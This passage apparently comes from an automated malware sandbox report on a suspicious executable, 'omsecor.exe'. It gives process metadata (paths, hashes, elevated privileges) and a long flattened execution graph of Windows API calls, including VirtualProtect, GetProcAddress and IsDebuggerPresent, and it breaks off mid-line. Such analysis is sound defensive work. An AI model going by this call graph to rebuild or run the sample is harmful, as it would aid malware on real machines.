                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:50E482AEFE2A49BBCB4AAEE1B8C70305
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:30
                        Start time:12:10:59
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0.3%
                          Signature Coverage:8.3%
                          Total number of Nodes:1163
                          Total number of Limit Nodes:12
3754 40478f 3755 40479e 3754->3755 3757 404121 __invoke_watson 10 API calls 3754->3757 3758 4047a7 GetModuleHandleA 3755->3758 3760 4047c8 3755->3760 3756->3693 3757->3755 3759 4047b6 GetProcAddress 3758->3759 3758->3760 3759->3760 3871 401aaa TlsGetValue 3760->3871 3881 403416 RtlLeaveCriticalSection 3762->3881 3764 4034ec 3764->3682 3766 404c3b 3765->3766 3767 404c45 3766->3767 3768 40427c _strcat_s 67 API calls 3766->3768 3767->3700 3769 404c5e 3768->3769 3770 40421d _strcat_s 67 API calls 3769->3770 3771 404c6e 3770->3771 3771->3700 3773 404be0 3772->3773 3774 404bd8 3772->3774 3775 40427c _strcat_s 67 API calls 3773->3775 3774->3773 3776 404c07 3774->3776 3780 404be5 3775->3780 3778 4024d6 3776->3778 3779 40427c _strcat_s 67 API calls 3776->3779 3777 40421d _strcat_s 67 API calls 3777->3778 3778->3719 3781 404121 3778->3781 3779->3780 3780->3777 3782 405f60 _memset 3781->3782 3783 4041b2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3782->3783 3784 4041f5 GetCurrentProcess TerminateProcess 3783->3784 3787 4041e9 __invoke_watson 3783->3787 3785 401662 setSBUpLow 5 API calls 3784->3785 3786 4024e7 3785->3786 3786->3719 3787->3784 3793 404a92 3788->3793 3789 404a96 3790 40427c _strcat_s 67 API calls 3789->3790 3791 40255b 3789->3791 3792 404ab2 3790->3792 3791->3725 3791->3736 3794 40421d _strcat_s 67 API calls 3792->3794 3793->3789 3793->3791 3795 404adc 3793->3795 3794->3791 3795->3791 3796 40427c _strcat_s 67 API calls 3795->3796 3796->3792 3798 404a26 3797->3798 3800 404a1e 3797->3800 3799 40427c _strcat_s 67 API calls 3798->3799 3805 404a2b 3799->3805 3800->3798 3802 404a5b 3800->3802 3801 40421d _strcat_s 67 API calls 3803 402581 3801->3803 3802->3803 3804 40427c _strcat_s 67 API calls 3802->3804 3803->3731 3803->3733 3804->3805 3805->3801 3807 401b18 _raise 61 API calls 3806->3807 3808 404862 3807->3808 3809 40487c LoadLibraryA 3808->3809 3813 404924 3808->3813 3810 404891 GetProcAddress 3809->3810 3823 4049f5 3809->3823 3812 
4048a7 3810->3812 3810->3823 3811 4049af 3815 401b21 __amsg_exit 61 API calls 3811->3815 3839 404994 3811->3839 3816 401aaa __init_pointers 61 API calls 3812->3816 3813->3811 3817 401b21 __amsg_exit 61 API calls 3813->3817 3814 401b21 __amsg_exit 61 API calls 3814->3823 3824 4049bf 3815->3824 3818 4048ad GetProcAddress 3816->3818 3819 404944 3817->3819 3820 401aaa __init_pointers 61 API calls 3818->3820 3821 401b21 __amsg_exit 61 API calls 3819->3821 3822 4048c2 GetProcAddress 3820->3822 3836 404951 3821->3836 3825 401aaa __init_pointers 61 API calls 3822->3825 3823->3740 3828 401b21 __amsg_exit 61 API calls 3824->3828 3824->3839 3826 4048d7 3825->3826 3827 4021f2 ___crtInitCritSecAndSpinCount 61 API calls 3826->3827 3829 4048e5 3827->3829 3828->3839 3830 4048f5 3829->3830 3832 404121 __invoke_watson 10 API calls 3829->3832 3830->3813 3833 4048fe GetProcAddress 3830->3833 3831 40497c 3834 402229 __init_pointers 61 API calls 3831->3834 3832->3830 3835 401aaa __init_pointers 61 API calls 3833->3835 3837 404985 3834->3837 3838 40490c 3835->3838 3836->3811 3836->3831 3837->3839 3841 404121 __invoke_watson 10 API calls 3837->3841 3838->3813 3840 404916 GetProcAddress 3838->3840 3839->3814 3842 401aaa __init_pointers 61 API calls 3840->3842 3841->3839 3842->3813 3844 40218c ExitProcess 3843->3844 3845 40217c GetProcAddress 3843->3845 3845->3844 3847 406701 3846->3847 3853 406662 3846->3853 3848 404832 _malloc 66 API calls 3847->3848 3849 406707 3848->3849 3851 40427c _strcat_s 66 API calls 3849->3851 3850 402605 __FF_MSGBANNER 66 API calls 3850->3853 3852 40670d 3851->3852 3852->3746 3853->3850 3854 406605 _malloc 66 API calls 3853->3854 3855 402465 __amsg_exit 66 API calls 3853->3855 3856 4066c5 RtlAllocateHeap 3853->3856 3857 402193 _malloc GetModuleHandleA GetProcAddress ExitProcess 3853->3857 3858 4066f8 3853->3858 3859 4066ec 3853->3859 3860 404832 _malloc 66 API calls 3853->3860 3862 4066ea 3853->3862 3854->3853 3855->3853 3856->3853 3857->3853 3858->3746 3861 
40427c _strcat_s 66 API calls 3859->3861 3860->3853 3861->3862 3863 40427c _strcat_s 66 API calls 3862->3863 3863->3858 3865 4021fd 3864->3865 3866 40427c _strcat_s 67 API calls 3865->3866 3867 402223 3865->3867 3868 402202 3866->3868 3867->3754 3869 40421d _strcat_s 67 API calls 3868->3869 3870 402212 3869->3870 3870->3754 3872 401abd 3871->3872 3873 401ade GetModuleHandleA 3871->3873 3872->3873 3874 401ac7 TlsGetValue 3872->3874 3875 401ad6 3873->3875 3876 401aef 3873->3876 3878 401ad2 3874->3878 3875->3756 3877 401a3e __init_pointers 63 API calls 3876->3877 3879 401af4 3877->3879 3878->3873 3878->3875 3879->3875 3880 401af8 GetProcAddress 3879->3880 3880->3875 3881->3764 3883 405413 RtlAllocateHeap 3882->3883 3884 4053df RtlReAllocateHeap 3882->3884 3886 4053fd 3883->3886 3887 405436 VirtualAlloc 3883->3887 3885 405401 3884->3885 3884->3886 3885->3883 3886->3661 3887->3886 3888 405450 HeapFree 3887->3888 3888->3886 3890 405491 VirtualAlloc 3889->3890 3892 4054d8 3890->3892 3892->3665 3893->3668 3899 402229 3894->3899 3896 401a59 3897 401a60 __init_pointers 3896->3897 3898 401a64 GetModuleHandleA 3896->3898 3897->3604 3898->3897 3900 402234 3899->3900 3901 402259 3900->3901 3902 40427c _strcat_s 67 API calls 3900->3902 3901->3896 3903 402239 3902->3903 3904 40421d _strcat_s 67 API calls 3903->3904 3905 402249 3904->3905 3905->3896 3906->3609 3908 40367a InterlockedIncrement 3907->3908 3909 40367d 3907->3909 3908->3909 3910 403687 InterlockedIncrement 3909->3910 3911 40368a 3909->3911 3910->3911 3912 403694 InterlockedIncrement 3911->3912 3913 403697 3911->3913 3912->3913 3914 4036a1 InterlockedIncrement 3913->3914 3916 4036a4 3913->3916 3914->3916 3915 4036b9 InterlockedIncrement 3915->3916 3916->3915 3917 4036c9 InterlockedIncrement 3916->3917 3918 4036d2 InterlockedIncrement 3916->3918 3917->3916 3918->3618 3922 403416 RtlLeaveCriticalSection 3919->3922 3921 401cc4 3921->3620 3922->3921 3924 4050f5 3923->3924 3929 405397 3923->3929 3925 4052e1 VirtualFree 
3924->3925 3924->3929 3926 405345 3925->3926 3927 405354 VirtualFree HeapFree 3926->3927 3926->3929 3928 4012f0 ___sbh_free_block __VEC_memcpy 3927->3928 3928->3929 3929->3629 3933 403416 RtlLeaveCriticalSection 3930->3933 3932 403fc1 3932->3633 3933->3932 4812 403000 4813 403038 4812->4813 4814 40302b 4812->4814 4816 401662 setSBUpLow 5 API calls 4813->4816 4815 401662 setSBUpLow 5 API calls 4814->4815 4815->4813 4819 403048 __except_handler4 4816->4819 4817 4030cf 4818 4030a4 __except_handler4 4818->4817 4820 4030bf 4818->4820 4821 401662 setSBUpLow 5 API calls 4818->4821 4819->4817 4819->4818 4824 4030e5 __except_handler4 4819->4824 4822 401662 setSBUpLow 5 API calls 4820->4822 4821->4820 4822->4817 4830 405c66 RtlUnwind 4824->4830 4825 403124 __except_handler4 4826 40315b 4825->4826 4828 401662 setSBUpLow 5 API calls 4825->4828 4827 401662 setSBUpLow 5 API calls 4826->4827 4829 40316b __except_handler4 4827->4829 4828->4826 4831 405c7b 4830->4831 4831->4825 4832 404800 4833 40480c SetLastError 4832->4833 4834 404814 _raise 4832->4834 4833->4834 4009 404348 4010 404032 __calloc_crt 67 API calls 4009->4010 4011 404352 4010->4011 4012 401aaa __init_pointers 67 API calls 4011->4012 4013 40435a 4012->4013 4835 401b8f TlsAlloc 4836 406c10 4837 406c22 4836->4837 4839 406c30 4836->4839 4838 401662 setSBUpLow 5 API calls 4837->4838 4838->4839 4014 404753 RtlInitializeCriticalSection 4015 405bd4 4016 405be6 4015->4016 4018 405bf4 @_EH4_CallFilterFunc@8 4015->4018 4019 401662 4016->4019 4020 40166a 4019->4020 4021 40166c IsDebuggerPresent 4019->4021 4020->4018 4027 4040c5 4021->4027 4024 4020c5 SetUnhandledExceptionFilter UnhandledExceptionFilter 4025 4020e2 __invoke_watson 4024->4025 4026 4020ea GetCurrentProcess TerminateProcess 4024->4026 4025->4026 4026->4018 4027->4024 4028 401d55 4029 401d61 _raise 4028->4029 4030 401d79 4029->4030 4032 401e55 _raise 4029->4032 4033 403f64 __freea 67 API calls 4029->4033 4031 401d87 4030->4031 4034 403f64 __freea 67 API calls 
4030->4034 4035 401d95 4031->4035 4036 403f64 __freea 67 API calls 4031->4036 4033->4030 4034->4031 4037 401da3 4035->4037 4038 403f64 __freea 67 API calls 4035->4038 4036->4035 4039 401db1 4037->4039 4041 403f64 __freea 67 API calls 4037->4041 4038->4037 4040 401dbf 4039->4040 4042 403f64 __freea 67 API calls 4039->4042 4043 403f64 __freea 67 API calls 4040->4043 4045 401dd0 4040->4045 4041->4039 4042->4040 4043->4045 4044 4034ee __lock 67 API calls 4046 401dd8 4044->4046 4045->4044 4047 401de4 InterlockedDecrement 4046->4047 4048 401dfd 4046->4048 4047->4048 4050 401def 4047->4050 4062 401e61 4048->4062 4050->4048 4053 403f64 __freea 67 API calls 4050->4053 4052 4034ee __lock 67 API calls 4054 401e11 4052->4054 4053->4048 4055 401e42 4054->4055 4065 4036e5 4054->4065 4109 401e6d 4055->4109 4059 403f64 __freea 67 API calls 4059->4032 4112 403416 RtlLeaveCriticalSection 4062->4112 4064 401e0a 4064->4052 4066 401e26 4065->4066 4067 4036ee InterlockedDecrement 4065->4067 4066->4055 4079 40351f 4066->4079 4068 403704 InterlockedDecrement 4067->4068 4069 403707 4067->4069 4068->4069 4070 403711 InterlockedDecrement 4069->4070 4071 403714 4069->4071 4070->4071 4072 403721 4071->4072 4073 40371e InterlockedDecrement 4071->4073 4074 40372b InterlockedDecrement 4072->4074 4076 40372e 4072->4076 4073->4072 4074->4076 4075 403743 InterlockedDecrement 4075->4076 4076->4075 4077 403753 InterlockedDecrement 4076->4077 4078 40375c InterlockedDecrement 4076->4078 4077->4076 4078->4066 4080 4035a0 4079->4080 4083 403533 4079->4083 4081 403f64 __freea 67 API calls 4080->4081 4082 4035ed 4080->4082 4084 4035c1 4081->4084 4092 403614 4082->4092 4137 405c97 4082->4137 4083->4080 4089 403f64 __freea 67 API calls 4083->4089 4093 403567 4083->4093 4087 403f64 __freea 67 API calls 4084->4087 4091 4035d4 4087->4091 4088 403f64 __freea 67 API calls 4088->4092 4095 40355c 4089->4095 4090 403653 4096 403f64 __freea 67 API calls 4090->4096 4097 403f64 __freea 67 API calls 4091->4097 4092->4090 
4104 403f64 67 API calls __freea 4092->4104 4098 403f64 __freea 67 API calls 4093->4098 4108 403588 4093->4108 4094 403f64 __freea 67 API calls 4099 403595 4094->4099 4113 405e67 4095->4113 4101 403659 4096->4101 4102 4035e2 4097->4102 4103 40357d 4098->4103 4105 403f64 __freea 67 API calls 4099->4105 4101->4055 4106 403f64 __freea 67 API calls 4102->4106 4129 405e27 4103->4129 4104->4092 4105->4080 4106->4082 4108->4094 4225 403416 RtlLeaveCriticalSection 4109->4225 4111 401e4f 4111->4059 4112->4064 4114 405e70 4113->4114 4128 405eed 4113->4128 4115 403f64 __freea 67 API calls 4114->4115 4116 405e81 4114->4116 4115->4116 4117 403f64 __freea 67 API calls 4116->4117 4119 405e93 4116->4119 4117->4119 4118 405ea5 4121 405eb7 4118->4121 4123 403f64 __freea 67 API calls 4118->4123 4119->4118 4120 403f64 __freea 67 API calls 4119->4120 4120->4118 4122 405ec9 4121->4122 4124 403f64 __freea 67 API calls 4121->4124 4125 405edb 4122->4125 4126 403f64 __freea 67 API calls 4122->4126 4123->4121 4124->4122 4127 403f64 __freea 67 API calls 4125->4127 4125->4128 4126->4125 4127->4128 4128->4093 4130 405e64 4129->4130 4132 405e30 4129->4132 4130->4108 4131 405e40 4133 405e52 4131->4133 4135 403f64 __freea 67 API calls 4131->4135 4132->4131 4134 403f64 __freea 67 API calls 4132->4134 4133->4130 4136 403f64 __freea 67 API calls 4133->4136 4134->4131 4135->4133 4136->4130 4138 405ca4 4137->4138 4224 40360d 4137->4224 4139 403f64 __freea 67 API calls 4138->4139 4140 405cac 4139->4140 4141 403f64 __freea 67 API calls 4140->4141 4142 405cb4 4141->4142 4143 403f64 __freea 67 API calls 4142->4143 4144 405cbc 4143->4144 4145 403f64 __freea 67 API calls 4144->4145 4146 405cc4 4145->4146 4147 403f64 __freea 67 API calls 4146->4147 4148 405ccc 4147->4148 4149 403f64 __freea 67 API calls 4148->4149 4150 405cd4 4149->4150 4151 403f64 __freea 67 API calls 4150->4151 4152 405cdb 4151->4152 4153 403f64 __freea 67 API calls 4152->4153 4154 405ce3 4153->4154 4155 403f64 __freea 67 API calls 
4154->4155 4156 405ceb 4155->4156 4157 403f64 __freea 67 API calls 4156->4157 4158 405cf3 4157->4158 4159 403f64 __freea 67 API calls 4158->4159 4160 405cfb 4159->4160 4161 403f64 __freea 67 API calls 4160->4161 4162 405d03 4161->4162 4163 403f64 __freea 67 API calls 4162->4163 4164 405d0b 4163->4164 4165 403f64 __freea 67 API calls 4164->4165 4166 405d13 4165->4166 4167 403f64 __freea 67 API calls 4166->4167 4168 405d1b 4167->4168 4169 403f64 __freea 67 API calls 4168->4169 4170 405d23 4169->4170 4171 403f64 __freea 67 API calls 4170->4171 4172 405d2e 4171->4172 4173 403f64 __freea 67 API calls 4172->4173 4174 405d36 4173->4174 4175 403f64 __freea 67 API calls 4174->4175 4176 405d3e 4175->4176 4177 403f64 __freea 67 API calls 4176->4177 4178 405d46 4177->4178 4179 403f64 __freea 67 API calls 4178->4179 4180 405d4e 4179->4180 4181 403f64 __freea 67 API calls 4180->4181 4182 405d56 4181->4182 4183 403f64 __freea 67 API calls 4182->4183 4184 405d5e 4183->4184 4185 403f64 __freea 67 API calls 4184->4185 4186 405d66 4185->4186 4187 403f64 __freea 67 API calls 4186->4187 4188 405d6e 4187->4188 4189 403f64 __freea 67 API calls 4188->4189 4190 405d76 4189->4190 4191 403f64 __freea 67 API calls 4190->4191 4192 405d7e 4191->4192 4193 403f64 __freea 67 API calls 4192->4193 4194 405d86 4193->4194 4195 403f64 __freea 67 API calls 4194->4195 4196 405d8e 4195->4196 4197 403f64 __freea 67 API calls 4196->4197 4198 405d96 4197->4198 4199 403f64 __freea 67 API calls 4198->4199 4200 405d9e 4199->4200 4201 403f64 __freea 67 API calls 4200->4201 4202 405da6 4201->4202 4203 403f64 __freea 67 API calls 4202->4203 4204 405db4 4203->4204 4205 403f64 __freea 67 API calls 4204->4205 4206 405dbf 4205->4206 4207 403f64 __freea 67 API calls 4206->4207 4208 405dca 4207->4208 4209 403f64 __freea 67 API calls 4208->4209 4210 405dd5 4209->4210 4211 403f64 __freea 67 API calls 4210->4211 4212 405de0 4211->4212 4213 403f64 __freea 67 API calls 4212->4213 4214 405deb 4213->4214 4215 403f64 __freea 67 
API calls 4214->4215 4216 405df6 4215->4216 4217 403f64 __freea 67 API calls 4216->4217 4218 405e01 4217->4218 4219 403f64 __freea 67 API calls 4218->4219 4220 405e0c 4219->4220 4221 403f64 __freea 67 API calls 4220->4221 4222 405e17 4221->4222 4223 403f64 __freea 67 API calls 4222->4223 4223->4224 4224->4088 4225->4111 3934 407a59 3935 407a70 3934->3935 3940 407ade 3934->3940 3935->3940 3947 407a98 GetModuleHandleA 3935->3947 3936 407b24 3960 407b29 3936->3960 3937 407ae7 GetModuleHandleA 3941 407af1 3937->3941 3940->3936 3940->3937 3940->3941 3941->3940 3942 407b11 GetProcAddress 3941->3942 3942->3940 3943 407a8f 3943->3940 3943->3941 3944 407ab2 GetProcAddress 3943->3944 3944->3940 3945 407abf VirtualProtect 3944->3945 3945->3940 3946 407ace VirtualProtect 3945->3946 3946->3940 3948 407aa1 3947->3948 3955 407ade 3947->3955 3968 407ab5 GetProcAddress 3948->3968 3950 407b24 3953 407b29 75 API calls 3950->3953 3951 407ae7 GetModuleHandleA 3958 407af1 3951->3958 3952 407aa6 3954 407ab2 GetProcAddress 3952->3954 3952->3955 3953->3950 3954->3955 3956 407abf VirtualProtect 3954->3956 3955->3950 3955->3951 3955->3958 3956->3955 3957 407ace VirtualProtect 3956->3957 3957->3955 3958->3955 3959 407b11 GetProcAddress 3958->3959 3959->3955 3961 4018b6 3960->3961 3985 403196 3961->3985 3963 4016d6 _raise 3964 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 3963->3964 3965 401714 3964->3965 3977 401671 3965->3977 3967 40171b _raise 3967->3936 3969 407ade 3968->3969 3970 407abf VirtualProtect 3968->3970 3972 407b24 3969->3972 3973 407ae7 GetModuleHandleA 3969->3973 3970->3969 3971 407ace VirtualProtect 3970->3971 3971->3969 3974 407b29 75 API calls 3972->3974 3976 407af1 3973->3976 3974->3972 3975 407b11 GetProcAddress 3975->3976 3976->3969 3976->3975 3978 40167a 3977->3978 3979 40167f 3977->3979 3980 402605 __FF_MSGBANNER 67 API calls 3978->3980 3981 402465 __amsg_exit 67 API calls 3979->3981 3980->3979 3982 401688 3981->3982 3983 402193 _malloc 3 API calls 3982->3983 
3984 401692 3983->3984 3984->3967 3986 4031c6 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3985->3986 3987 4031b9 3985->3987 3988 4031bd 3986->3988 3987->3986 3987->3988 3988->3963 4226 4023d9 4229 4022f7 4226->4229 4228 4023e6 4230 402303 _raise 4229->4230 4231 4034ee __lock 67 API calls 4230->4231 4232 40230a 4231->4232 4233 402379 _raise 4232->4233 4235 401b21 __amsg_exit 67 API calls 4232->4235 4249 4023c4 4233->4249 4237 402339 4235->4237 4239 401b21 __amsg_exit 67 API calls 4237->4239 4238 4023c1 _raise 4238->4228 4243 402347 4239->4243 4241 4023b8 4242 402193 _malloc 3 API calls 4241->4242 4242->4238 4243->4233 4245 401b21 __amsg_exit 67 API calls 4243->4245 4246 401b18 4243->4246 4245->4243 4247 401aaa __init_pointers 67 API calls 4246->4247 4248 401b1f 4247->4248 4248->4243 4250 4023a5 4249->4250 4251 4023ca 4249->4251 4250->4238 4253 403416 RtlLeaveCriticalSection 4250->4253 4254 403416 RtlLeaveCriticalSection 4251->4254 4253->4241 4254->4250 4255 402c5b 4270 402f98 4255->4270 4257 402c67 GetStartupInfoA 4258 404032 __calloc_crt 67 API calls 4257->4258 4264 402c88 4258->4264 4259 402e92 _raise 4260 402e0f GetStdHandle 4265 402dd9 4260->4265 4261 404032 __calloc_crt 67 API calls 4261->4264 4262 402e74 SetHandleCount 4262->4259 4263 402e21 GetFileType 4263->4265 4264->4259 4264->4261 4264->4265 4267 402d5c 4264->4267 4265->4259 4265->4260 4265->4262 4265->4263 4266 404763 ___crtInitCritSecAndSpinCount 67 API calls 4265->4266 4266->4265 4267->4259 4267->4265 4268 402d85 GetFileType 4267->4268 4269 404763 ___crtInitCritSecAndSpinCount 67 API calls 4267->4269 4268->4267 4269->4267 4270->4257 4840 40279d 4841 4027a9 4840->4841 4845 4027ae 4840->4845 4842 403f46 ___initmbctable 111 API calls 4841->4842 4842->4845 4843 4027ea 4844 404cc7 __wincmdln 77 API calls 4844->4845 4845->4843 4845->4844 4271 401863 4274 40263f 4271->4274 4275 401cc6 _raise 67 API calls 4274->4275 4276 401874 4275->4276 4277 402265 4278 
40226e __except_handler4 4277->4278 4283 4043c5 4278->4283 4280 40228d __initterm_e 4282 4022ae __except_handler4 4280->4282 4287 4043b3 4280->4287 4284 4043c9 4283->4284 4285 401aaa __init_pointers 67 API calls 4284->4285 4286 4043e1 4284->4286 4285->4284 4286->4280 4290 404377 4287->4290 4289 4043bc 4289->4282 4291 404383 _raise 4290->4291 4298 4021a8 4291->4298 4297 4043a4 _raise 4297->4289 4299 4034ee __lock 67 API calls 4298->4299 4300 4021af 4299->4300 4301 40428f 4300->4301 4302 401b21 __amsg_exit 67 API calls 4301->4302 4303 40429f 4302->4303 4304 401b21 __amsg_exit 67 API calls 4303->4304 4305 4042b0 4304->4305 4312 404333 4305->4312 4321 406b43 4305->4321 4307 401aaa __init_pointers 67 API calls 4308 404328 4307->4308 4310 401aaa __init_pointers 67 API calls 4308->4310 4309 4042ce 4313 4042f0 4309->4313 4317 404319 4309->4317 4334 40407a 4309->4334 4310->4312 4318 4043ad 4312->4318 4313->4312 4314 40407a __realloc_crt 73 API calls 4313->4314 4315 404307 4313->4315 4314->4315 4315->4312 4316 401aaa __init_pointers 67 API calls 4315->4316 4316->4317 4317->4307 4383 4021b1 4318->4383 4322 406b4f _raise 4321->4322 4323 406b7c 4322->4323 4324 406b5f 4322->4324 4326 406bbd RtlSizeHeap 4323->4326 4328 4034ee __lock 67 API calls 4323->4328 4325 40427c _strcat_s 67 API calls 4324->4325 4327 406b64 4325->4327 4330 406b74 _raise 4326->4330 4329 40421d _strcat_s 67 API calls 4327->4329 4331 406b8c ___sbh_find_block 4328->4331 4329->4330 4330->4309 4339 406bdd 4331->4339 4337 40407e 4334->4337 4336 4040c0 4336->4313 4337->4336 4338 4040a1 Sleep 4337->4338 4343 406835 4337->4343 4338->4337 4342 403416 RtlLeaveCriticalSection 4339->4342 4341 406bb8 4341->4326 4341->4330 4342->4341 4344 406841 _raise 4343->4344 4345 406856 4344->4345 4346 406848 4344->4346 4348 406869 4345->4348 4349 40685d 4345->4349 4347 406654 _malloc 67 API calls 4346->4347 4370 406850 _raise _realloc 4347->4370 4355 4069db 4348->4355 4367 406876 ___sbh_resize_block ___sbh_find_block 
___crtGetEnvironmentStringsA 4348->4367 4350 403f64 __freea 67 API calls 4349->4350 4350->4370 4351 406a0e 4354 404832 _malloc 67 API calls 4351->4354 4352 4069e0 RtlReAllocateHeap 4352->4355 4352->4370 4353 4034ee __lock 67 API calls 4353->4367 4356 406a14 4354->4356 4355->4351 4355->4352 4357 406a32 4355->4357 4359 404832 _malloc 67 API calls 4355->4359 4362 406a28 4355->4362 4358 40427c _strcat_s 67 API calls 4356->4358 4360 40427c _strcat_s 67 API calls 4357->4360 4357->4370 4358->4370 4359->4355 4361 406a3b GetLastError 4360->4361 4361->4370 4364 40427c _strcat_s 67 API calls 4362->4364 4377 4069a9 4364->4377 4365 406901 RtlAllocateHeap 4365->4367 4366 406956 RtlReAllocateHeap 4366->4367 4367->4351 4367->4353 4367->4365 4367->4366 4369 405861 ___sbh_alloc_block 5 API calls 4367->4369 4367->4370 4371 4069c1 4367->4371 4372 404832 _malloc 67 API calls 4367->4372 4375 4069a4 4367->4375 4378 4050b8 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 4367->4378 4379 406979 4367->4379 4368 4069ae GetLastError 4368->4370 4369->4367 4370->4337 4371->4370 4373 40427c _strcat_s 67 API calls 4371->4373 4372->4367 4374 4069ce 4373->4374 4374->4361 4374->4370 4376 40427c _strcat_s 67 API calls 4375->4376 4376->4377 4377->4368 4377->4370 4378->4367 4382 403416 RtlLeaveCriticalSection 4379->4382 4381 406980 4381->4367 4382->4381 4386 403416 RtlLeaveCriticalSection 4383->4386 4385 4021b8 4385->4297 4386->4385 4846 402b26 4847 402b42 GetEnvironmentStringsW 4846->4847 4848 402b61 4846->4848 4849 402b56 GetLastError 4847->4849 4850 402b4a 4847->4850 4848->4850 4851 402bfc 4848->4851 4849->4848 4852 402b8b WideCharToMultiByte 4850->4852 4853 402b7c GetEnvironmentStringsW 4850->4853 4854 402c04 GetEnvironmentStrings 4851->4854 4855 402b84 4851->4855 4858 402bf1 FreeEnvironmentStringsW 4852->4858 4859 402bbf 4852->4859 4853->4852 4853->4855 4854->4855 4856 402c14 4854->4856 4861 403ff2 __malloc_crt 67 API calls 4856->4861 4858->4855 4860 403ff2 __malloc_crt 67 API calls 
4859->4860 4863 402bc5 4860->4863 4862 402c2d 4861->4862 4864 402c40 ___crtGetEnvironmentStringsA 4862->4864 4865 402c34 FreeEnvironmentStringsA 4862->4865 4863->4858 4866 402bce WideCharToMultiByte 4863->4866 4869 402c48 FreeEnvironmentStringsA 4864->4869 4865->4855 4867 402be8 4866->4867 4868 402bdf 4866->4868 4867->4858 4870 403f64 __freea 67 API calls 4868->4870 4869->4855 4870->4867 4871 4210ae 4873 4210cd 4871->4873 4874 42115b 4873->4874 4876 421170 4874->4876 4877 4018b6 4876->4877 4878 403196 ___security_init_cookie 5 API calls 4877->4878 4879 4016d6 _raise 4878->4879 4880 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 4879->4880 4881 401714 4880->4881 4882 401671 _fast_error_exit 67 API calls 4881->4882 4883 40171b _raise 4882->4883 4390 402a6d 4391 402a80 4390->4391 4392 402a85 GetModuleFileNameA 4390->4392 4401 403f46 4391->4401 4394 402aac 4392->4394 4405 4028d5 4394->4405 4396 402b08 4398 403ff2 __malloc_crt 67 API calls 4399 402aee 4398->4399 4399->4396 4400 4028d5 _parse_cmdline 77 API calls 4399->4400 4400->4396 4402 403f56 4401->4402 4403 403f4f 4401->4403 4402->4392 4411 403dac 4403->4411 4407 4028f2 4405->4407 4409 40295f 4407->4409 4663 404cc7 4407->4663 4408 402a5d 4408->4396 4408->4398 4409->4408 4410 404cc7 77 API calls __wincmdln 4409->4410 4410->4409 4412 403db8 _raise 4411->4412 4413 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4412->4413 4414 403dc1 4413->4414 4442 403a33 4414->4442 4416 403dcb 4458 403b59 4416->4458 4419 403ff2 __malloc_crt 67 API calls 4420 403dec 4419->4420 4421 403f0b _raise 4420->4421 4465 403bd3 4420->4465 4421->4402 4424 403f18 4424->4421 4429 403f64 __freea 67 API calls 4424->4429 4433 403f2b 4424->4433 4425 403e1c InterlockedDecrement 4426 403e2c 4425->4426 4427 403e3d InterlockedIncrement 4425->4427 4426->4427 4431 403f64 __freea 67 API calls 4426->4431 4427->4421 4428 403e53 4427->4428 4428->4421 4432 4034ee __lock 67 API calls 4428->4432 4429->4433 4430 40427c _strcat_s 67 API calls 4430->4421 4434 
403e3c 4431->4434 4436 403e67 InterlockedDecrement 4432->4436 4433->4430 4434->4427 4437 403ee3 4436->4437 4438 403ef6 InterlockedIncrement 4436->4438 4437->4438 4440 403f64 __freea 67 API calls 4437->4440 4475 403f0d 4438->4475 4441 403ef5 4440->4441 4441->4438 4443 403a3f _raise 4442->4443 4444 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4443->4444 4445 403a44 4444->4445 4446 4034ee __lock 67 API calls 4445->4446 4447 403a56 4445->4447 4448 403a74 4446->4448 4450 403a64 _raise 4447->4450 4454 402149 __amsg_exit 67 API calls 4447->4454 4449 403abd 4448->4449 4451 403aa5 InterlockedIncrement 4448->4451 4452 403a8b InterlockedDecrement 4448->4452 4478 403ace 4449->4478 4450->4416 4451->4449 4452->4451 4455 403a96 4452->4455 4454->4450 4455->4451 4456 403f64 __freea 67 API calls 4455->4456 4457 403aa4 4456->4457 4457->4451 4482 403ad7 4458->4482 4461 403b94 4463 403b99 GetACP 4461->4463 4464 403b86 4461->4464 4462 403b76 GetOEMCP 4462->4464 4463->4464 4464->4419 4464->4421 4466 403b59 getSystemCP 79 API calls 4465->4466 4467 403bf1 4466->4467 4468 403bfc setSBCS 4467->4468 4471 403c40 IsValidCodePage 4467->4471 4474 403c65 _memset __setmbcp 4467->4474 4469 401662 setSBUpLow 5 API calls 4468->4469 4470 403daa 4469->4470 4470->4424 4470->4425 4471->4468 4472 403c52 GetCPInfo 4471->4472 4472->4468 4472->4474 4517 4038a9 GetCPInfo 4474->4517 4662 403416 RtlLeaveCriticalSection 4475->4662 4477 403f14 4477->4421 4481 403416 RtlLeaveCriticalSection 4478->4481 4480 403ad5 4480->4447 4481->4480 4483 403ae6 4482->4483 4489 403b33 4482->4489 4484 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4483->4484 4485 403aeb 4484->4485 4486 403b13 4485->4486 4490 4037af 4485->4490 4488 403a33 _LocaleUpdate::_LocaleUpdate 69 API calls 4486->4488 4486->4489 4488->4489 4489->4461 4489->4462 4491 4037bb _raise 4490->4491 4492 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4491->4492 4493 4037c0 4492->4493 4494 4037ee 4493->4494 4496 4037d2 4493->4496 4495 4034ee __lock 67 API calls 
